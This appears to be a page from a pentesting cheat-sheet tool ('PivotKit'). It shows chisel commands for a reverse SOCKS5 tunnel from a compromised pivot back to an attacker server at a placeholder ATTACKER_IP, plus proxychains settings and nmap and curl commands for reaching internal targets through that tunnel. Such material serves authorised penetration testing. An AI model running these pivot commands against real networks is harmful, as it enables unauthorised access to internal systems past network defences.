PivotKit
Attacker / Pentester Perspective
Live
HTTP-tunnelled TCP/UDP pivot using a client/server model over SSH transport. Learn about this tool.
Attacker←Pivot 1
Attacker (Server)
WinLinux
socks5
Pivot 1 (Client)
WinLinux
Reverse SOCKS5 Tunnel
On Attacker (Server)
1
./chisel server --port 8080 --reverse --socks5Copy3
# /etc/proxychains.conf (hop 1):
# socks5 127.0.0.1 1080Copy4
# proxychains nmap -sT -Pn <TARGET>
# proxychains curl http://<INTERNAL_TARGET>CopyOn Pivot 1 (Client)
2
./chisel client <ATTACKER_IP>:8080 R:socksCopy